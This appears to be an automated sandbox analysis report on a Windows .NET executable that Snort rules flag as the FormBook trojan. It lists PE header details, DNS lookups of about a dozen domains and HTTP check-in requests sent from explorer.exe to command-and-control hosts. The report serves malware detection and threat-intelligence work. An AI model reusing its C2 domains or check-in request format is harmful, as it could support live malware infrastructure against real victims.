File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4"..................N..........>l... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x466c3e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xEB22348E [Mon Jan 3 10:03:58 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x66bf0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x68000	0x4c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x64c44	0x64e00	False	0.870425766729	data	7.74726232744	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x68000	0x4c0	0x600	False	0.371744791667	data	3.68166611193	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x680a0	0x234	data
RT_MANIFEST	0x682d4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	0.0.0.0
InternalName	Li.exe
FileVersion	0.0.0.0
ProductVersion	0.0.0.0
FileDescription
OriginalFilename	Li.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/02/21-20:00:13.946948	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49795	34.102.136.180	192.168.2.4
12/02/21-20:00:30.227937	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.4	147.255.129.44
12/02/21-20:00:30.227937	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.4	147.255.129.44
12/02/21-20:00:30.227937	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.4	147.255.129.44
12/02/21-20:00:35.804477	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.4	15.197.142.173
12/02/21-20:00:35.804477	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.4	15.197.142.173
12/02/21-20:00:35.804477	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.4	15.197.142.173
12/02/21-20:00:36.003989	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49834	15.197.142.173	192.168.2.4
12/02/21-20:00:46.504425	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	23.227.38.74
12/02/21-20:00:46.504425	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	23.227.38.74
12/02/21-20:00:46.504425	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	23.227.38.74
12/02/21-20:00:46.553481	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49857	23.227.38.74	192.168.2.4
12/02/21-20:01:08.006106	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49908	34.102.136.180	192.168.2.4
12/02/21-20:01:13.388249	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49909	80	192.168.2.4	43.132.183.85
12/02/21-20:01:13.388249	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49909	80	192.168.2.4	43.132.183.85
12/02/21-20:01:13.388249	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49909	80	192.168.2.4	43.132.183.85

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 20:00:13.748461008 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:13.767793894 CET	80	49795	34.102.136.180	192.168.2.4
Dec 2, 2021 20:00:13.767949104 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:13.768181086 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:13.787358999 CET	80	49795	34.102.136.180	192.168.2.4
Dec 2, 2021 20:00:13.946948051 CET	80	49795	34.102.136.180	192.168.2.4
Dec 2, 2021 20:00:13.946983099 CET	80	49795	34.102.136.180	192.168.2.4
Dec 2, 2021 20:00:13.947145939 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:13.947192907 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:14.245307922 CET	49795	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:00:14.264705896 CET	80	49795	34.102.136.180	192.168.2.4
Dec 2, 2021 20:00:18.979742050 CET	49809	80	192.168.2.4	35.209.150.94
Dec 2, 2021 20:00:19.109371901 CET	80	49809	35.209.150.94	192.168.2.4
Dec 2, 2021 20:00:19.109591007 CET	49809	80	192.168.2.4	35.209.150.94
Dec 2, 2021 20:00:19.110166073 CET	49809	80	192.168.2.4	35.209.150.94
Dec 2, 2021 20:00:19.239556074 CET	80	49809	35.209.150.94	192.168.2.4
Dec 2, 2021 20:00:19.620712042 CET	49809	80	192.168.2.4	35.209.150.94
Dec 2, 2021 20:00:19.791668892 CET	80	49809	35.209.150.94	192.168.2.4
Dec 2, 2021 20:00:23.170021057 CET	80	49809	35.209.150.94	192.168.2.4
Dec 2, 2021 20:00:23.170135021 CET	49809	80	192.168.2.4	35.209.150.94
Dec 2, 2021 20:00:30.049437046 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:30.227549076 CET	80	49816	147.255.129.44	192.168.2.4
Dec 2, 2021 20:00:30.227710962 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:30.227936983 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:30.461924076 CET	80	49816	147.255.129.44	192.168.2.4
Dec 2, 2021 20:00:30.730988026 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:30.732290983 CET	80	49816	147.255.129.44	192.168.2.4
Dec 2, 2021 20:00:30.732397079 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:30.908973932 CET	80	49816	147.255.129.44	192.168.2.4
Dec 2, 2021 20:00:30.909821033 CET	49816	80	192.168.2.4	147.255.129.44
Dec 2, 2021 20:00:35.785365105 CET	49834	80	192.168.2.4	15.197.142.173
Dec 2, 2021 20:00:35.804188013 CET	80	49834	15.197.142.173	192.168.2.4
Dec 2, 2021 20:00:35.804287910 CET	49834	80	192.168.2.4	15.197.142.173
Dec 2, 2021 20:00:35.804476976 CET	49834	80	192.168.2.4	15.197.142.173
Dec 2, 2021 20:00:35.823292017 CET	80	49834	15.197.142.173	192.168.2.4
Dec 2, 2021 20:00:36.003988981 CET	80	49834	15.197.142.173	192.168.2.4
Dec 2, 2021 20:00:36.004034996 CET	80	49834	15.197.142.173	192.168.2.4
Dec 2, 2021 20:00:36.004340887 CET	49834	80	192.168.2.4	15.197.142.173
Dec 2, 2021 20:00:36.134852886 CET	49834	80	192.168.2.4	15.197.142.173
Dec 2, 2021 20:00:36.153865099 CET	80	49834	15.197.142.173	192.168.2.4
Dec 2, 2021 20:00:41.210109949 CET	49852	80	192.168.2.4	87.236.16.208
Dec 2, 2021 20:00:41.277066946 CET	80	49852	87.236.16.208	192.168.2.4
Dec 2, 2021 20:00:41.277260065 CET	49852	80	192.168.2.4	87.236.16.208
Dec 2, 2021 20:00:41.277611017 CET	49852	80	192.168.2.4	87.236.16.208
Dec 2, 2021 20:00:41.345006943 CET	80	49852	87.236.16.208	192.168.2.4
Dec 2, 2021 20:00:41.402823925 CET	80	49852	87.236.16.208	192.168.2.4
Dec 2, 2021 20:00:41.402864933 CET	80	49852	87.236.16.208	192.168.2.4
Dec 2, 2021 20:00:41.403094053 CET	49852	80	192.168.2.4	87.236.16.208
Dec 2, 2021 20:00:41.403291941 CET	49852	80	192.168.2.4	87.236.16.208
Dec 2, 2021 20:00:41.470031023 CET	80	49852	87.236.16.208	192.168.2.4
Dec 2, 2021 20:00:46.486143112 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:46.503976107 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.504163980 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:46.504425049 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:46.522779942 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553481102 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553522110 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553544044 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553566933 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553586006 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553596973 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.553838015 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:46.554032087 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:46.554157972 CET	80	49857	23.227.38.74	192.168.2.4
Dec 2, 2021 20:00:46.554244995 CET	49857	80	192.168.2.4	23.227.38.74
Dec 2, 2021 20:00:51.628223896 CET	49859	80	192.168.2.4	142.250.203.115
Dec 2, 2021 20:00:51.645632029 CET	80	49859	142.250.203.115	192.168.2.4
Dec 2, 2021 20:00:51.645771027 CET	49859	80	192.168.2.4	142.250.203.115
Dec 2, 2021 20:00:51.645944118 CET	49859	80	192.168.2.4	142.250.203.115
Dec 2, 2021 20:00:51.663521051 CET	80	49859	142.250.203.115	192.168.2.4
Dec 2, 2021 20:00:51.680239916 CET	80	49859	142.250.203.115	192.168.2.4
Dec 2, 2021 20:00:51.680383921 CET	80	49859	142.250.203.115	192.168.2.4
Dec 2, 2021 20:00:51.680500031 CET	49859	80	192.168.2.4	142.250.203.115
Dec 2, 2021 20:00:51.680620909 CET	49859	80	192.168.2.4	142.250.203.115
Dec 2, 2021 20:00:51.698009014 CET	80	49859	142.250.203.115	192.168.2.4
Dec 2, 2021 20:00:56.876818895 CET	49873	80	192.168.2.4	198.143.147.58
Dec 2, 2021 20:00:57.042452097 CET	80	49873	198.143.147.58	192.168.2.4
Dec 2, 2021 20:00:57.042573929 CET	49873	80	192.168.2.4	198.143.147.58
Dec 2, 2021 20:00:57.042764902 CET	49873	80	192.168.2.4	198.143.147.58
Dec 2, 2021 20:00:57.208177090 CET	80	49873	198.143.147.58	192.168.2.4
Dec 2, 2021 20:00:57.434561014 CET	80	49873	198.143.147.58	192.168.2.4
Dec 2, 2021 20:00:57.434598923 CET	80	49873	198.143.147.58	192.168.2.4
Dec 2, 2021 20:00:57.434801102 CET	49873	80	192.168.2.4	198.143.147.58
Dec 2, 2021 20:00:57.434843063 CET	49873	80	192.168.2.4	198.143.147.58
Dec 2, 2021 20:00:57.600678921 CET	80	49873	198.143.147.58	192.168.2.4
Dec 2, 2021 20:01:02.493794918 CET	49900	80	192.168.2.4	107.164.242.49
Dec 2, 2021 20:01:02.663944006 CET	80	49900	107.164.242.49	192.168.2.4
Dec 2, 2021 20:01:02.664150953 CET	49900	80	192.168.2.4	107.164.242.49
Dec 2, 2021 20:01:02.664268970 CET	49900	80	192.168.2.4	107.164.242.49
Dec 2, 2021 20:01:02.834525108 CET	80	49900	107.164.242.49	192.168.2.4
Dec 2, 2021 20:01:02.834745884 CET	80	49900	107.164.242.49	192.168.2.4
Dec 2, 2021 20:01:02.834858894 CET	80	49900	107.164.242.49	192.168.2.4
Dec 2, 2021 20:01:02.835042000 CET	49900	80	192.168.2.4	107.164.242.49
Dec 2, 2021 20:01:02.835110903 CET	49900	80	192.168.2.4	107.164.242.49
Dec 2, 2021 20:01:03.005115032 CET	80	49900	107.164.242.49	192.168.2.4
Dec 2, 2021 20:01:07.871548891 CET	49908	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:01:07.890765905 CET	80	49908	34.102.136.180	192.168.2.4
Dec 2, 2021 20:01:07.890892029 CET	49908	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:01:07.891082048 CET	49908	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:01:07.910243034 CET	80	49908	34.102.136.180	192.168.2.4
Dec 2, 2021 20:01:08.006105900 CET	80	49908	34.102.136.180	192.168.2.4
Dec 2, 2021 20:01:08.006131887 CET	80	49908	34.102.136.180	192.168.2.4
Dec 2, 2021 20:01:08.006305933 CET	49908	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:01:08.006448030 CET	49908	80	192.168.2.4	34.102.136.180
Dec 2, 2021 20:01:08.025432110 CET	80	49908	34.102.136.180	192.168.2.4
Dec 2, 2021 20:01:13.195795059 CET	49909	80	192.168.2.4	43.132.183.85
Dec 2, 2021 20:01:13.387615919 CET	80	49909	43.132.183.85	192.168.2.4
Dec 2, 2021 20:01:13.387923956 CET	49909	80	192.168.2.4	43.132.183.85
Dec 2, 2021 20:01:13.388248920 CET	49909	80	192.168.2.4	43.132.183.85
Dec 2, 2021 20:01:13.579745054 CET	80	49909	43.132.183.85	192.168.2.4
Dec 2, 2021 20:01:13.579788923 CET	80	49909	43.132.183.85	192.168.2.4
Dec 2, 2021 20:01:13.579842091 CET	80	49909	43.132.183.85	192.168.2.4
Dec 2, 2021 20:01:13.580074072 CET	49909	80	192.168.2.4	43.132.183.85
Dec 2, 2021 20:01:13.580228090 CET	49909	80	192.168.2.4	43.132.183.85
Dec 2, 2021 20:01:13.771763086 CET	80	49909	43.132.183.85	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 20:00:13.718374014 CET	51726	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:13.740935087 CET	53	51726	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:18.953963995 CET	56627	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:18.978465080 CET	53	56627	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:24.642744064 CET	63116	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:24.687735081 CET	53	63116	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:29.723052025 CET	64078	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:30.047213078 CET	53	64078	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:35.755206108 CET	64801	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:35.783483028 CET	53	64801	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:41.153199911 CET	61721	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:41.207889080 CET	53	61721	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:46.457046032 CET	51255	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:46.485023975 CET	53	51255	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:51.564862967 CET	52337	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:51.625777960 CET	53	52337	8.8.8.8	192.168.2.4
Dec 2, 2021 20:00:56.692248106 CET	49612	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:00:56.875401020 CET	53	49612	8.8.8.8	192.168.2.4
Dec 2, 2021 20:01:02.459018946 CET	49285	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:01:02.492113113 CET	53	49285	8.8.8.8	192.168.2.4
Dec 2, 2021 20:01:07.847434998 CET	50601	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:01:07.869749069 CET	53	50601	8.8.8.8	192.168.2.4
Dec 2, 2021 20:01:13.021336079 CET	60875	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:01:13.193341970 CET	53	60875	8.8.8.8	192.168.2.4
Dec 2, 2021 20:01:18.595891953 CET	56448	53	192.168.2.4	8.8.8.8
Dec 2, 2021 20:01:18.621252060 CET	53	56448	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 20:00:13.718374014 CET	192.168.2.4	8.8.8.8	0x3d58	Standard query (0)	www.royallecleaning.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:18.953963995 CET	192.168.2.4	8.8.8.8	0x3e8c	Standard query (0)	www.scion-go-getter.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:24.642744064 CET	192.168.2.4	8.8.8.8	0x2b1a	Standard query (0)	www.sandman.network	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:29.723052025 CET	192.168.2.4	8.8.8.8	0xf5b8	Standard query (0)	www.21yingyang.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:35.755206108 CET	192.168.2.4	8.8.8.8	0x5843	Standard query (0)	www.texascountrycharts.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:41.153199911 CET	192.168.2.4	8.8.8.8	0xc300	Standard query (0)	www.tikomobile.store	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:46.457046032 CET	192.168.2.4	8.8.8.8	0xd203	Standard query (0)	www.fulvousemollientplanet.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:51.564862967 CET	192.168.2.4	8.8.8.8	0x67b7	Standard query (0)	www.experimentwithoutlimits.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:56.692248106 CET	192.168.2.4	8.8.8.8	0xd2e9	Standard query (0)	www.websitessample.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:02.459018946 CET	192.168.2.4	8.8.8.8	0x70c8	Standard query (0)	www.foxandmew.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:07.847434998 CET	192.168.2.4	8.8.8.8	0x46b4	Standard query (0)	www.9linefarms.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:13.021336079 CET	192.168.2.4	8.8.8.8	0xf31e	Standard query (0)	www.rip-online.com	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:18.595891953 CET	192.168.2.4	8.8.8.8	0x2ac0	Standard query (0)	www.fourthandwhiteoak.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 2, 2021 20:00:13.740935087 CET	8.8.8.8	192.168.2.4	0x3d58	No error (0)	www.royallecleaning.com	royallecleaning.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:00:13.740935087 CET	8.8.8.8	192.168.2.4	0x3d58	No error (0)	royallecleaning.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:18.978465080 CET	8.8.8.8	192.168.2.4	0x3e8c	No error (0)	www.scion-go-getter.com		35.209.150.94	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:24.687735081 CET	8.8.8.8	192.168.2.4	0x2b1a	Name error (3)	www.sandman.network	none	none	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:30.047213078 CET	8.8.8.8	192.168.2.4	0xf5b8	No error (0)	www.21yingyang.com		147.255.129.44	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:35.783483028 CET	8.8.8.8	192.168.2.4	0x5843	No error (0)	www.texascountrycharts.com	texascountrycharts.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:00:35.783483028 CET	8.8.8.8	192.168.2.4	0x5843	No error (0)	texascountrycharts.com		15.197.142.173	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:35.783483028 CET	8.8.8.8	192.168.2.4	0x5843	No error (0)	texascountrycharts.com		3.33.152.147	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:41.207889080 CET	8.8.8.8	192.168.2.4	0xc300	No error (0)	www.tikomobile.store		87.236.16.208	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:46.485023975 CET	8.8.8.8	192.168.2.4	0xd203	No error (0)	www.fulvousemollientplanet.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:00:46.485023975 CET	8.8.8.8	192.168.2.4	0xd203	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:51.625777960 CET	8.8.8.8	192.168.2.4	0x67b7	No error (0)	www.experimentwithoutlimits.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:00:51.625777960 CET	8.8.8.8	192.168.2.4	0x67b7	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)
Dec 2, 2021 20:00:56.875401020 CET	8.8.8.8	192.168.2.4	0xd2e9	No error (0)	www.websitessample.com	websitessample.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:00:56.875401020 CET	8.8.8.8	192.168.2.4	0xd2e9	No error (0)	websitessample.com		198.143.147.58	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:02.492113113 CET	8.8.8.8	192.168.2.4	0x70c8	No error (0)	www.foxandmew.com		107.164.242.49	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:07.869749069 CET	8.8.8.8	192.168.2.4	0x46b4	No error (0)	www.9linefarms.com	9linefarms.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 20:01:07.869749069 CET	8.8.8.8	192.168.2.4	0x46b4	No error (0)	9linefarms.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:13.193341970 CET	8.8.8.8	192.168.2.4	0xf31e	No error (0)	www.rip-online.com		43.132.183.85	A (IP address)	IN (0x0001)
Dec 2, 2021 20:01:18.621252060 CET	8.8.8.8	192.168.2.4	0x2ac0	Name error (3)	www.fourthandwhiteoak.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.royallecleaning.com

www.scion-go-getter.com

www.21yingyang.com

www.texascountrycharts.com

www.tikomobile.store

www.fulvousemollientplanet.com

www.experimentwithoutlimits.com

www.websitessample.com

www.foxandmew.com

www.9linefarms.com

www.rip-online.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49795	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:13.768181086 CET	1548	OUT	GET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.royallecleaning.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:13.946948051 CET	1559	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 02 Dec 2021 19:00:13 GMT Content-Type: text/html Content-Length: 275 ETag: "618be73d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49809	35.209.150.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:19.110166073 CET	2045	OUT	GET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.scion-go-getter.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49909	43.132.183.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
